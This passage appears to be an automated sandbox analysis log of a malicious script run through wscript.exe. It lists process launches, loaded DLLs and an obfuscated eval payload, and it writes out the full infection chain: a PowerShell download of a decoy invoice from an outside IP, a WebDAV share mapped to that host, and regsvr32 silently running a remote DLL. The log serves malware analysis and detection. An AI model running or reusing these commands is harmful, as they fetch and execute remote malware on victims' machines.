    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1744,i,18161430030709773635,14504383451938275129,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1744,i,18161430030709773635,14504383451938275129,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

    Data Obfuscation

    barindex
    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.RegRead("HKEY_CURRENT_USER\Control Panel\International\Locale");IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\5105.js.csv");ITextStream.WriteLine(" entry:2500 f:wedejlzf");ITextStream.WriteLine(" exec:2 f:wedejlzf");ITextStream.WriteLine(" entry:5 o: f:eval a0:%22jszwx%3D%5B1031%2C3079%2C5127%2C4103%2C2055%2C3072%5D%3Bvar%20dklkd%3Dthis%5Bjbnac%2Bdbiqu%2Bhplcgqwyf%2Boxfzkuk%2Bnmelztyk%2Bdntnoot%2Bwzzcxwlu%2Bwgofg%5D(this%5Bqdfpa%2Bqyzap%2Bhkcvt%2Bhplcgqwyf%2Bm");IHost.CreateObject("WScript.Shell");IWshShell3.RegRead("HKEY_CURRENT_USER\Control Panel\International\Locale");IHost.CreateObject("WScript.Shell");IWshShell3.Run("cmd /c powershell.exe -Command "Invoke-WebRequest -OutFile %temp%\invoice.", "0", "false")
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
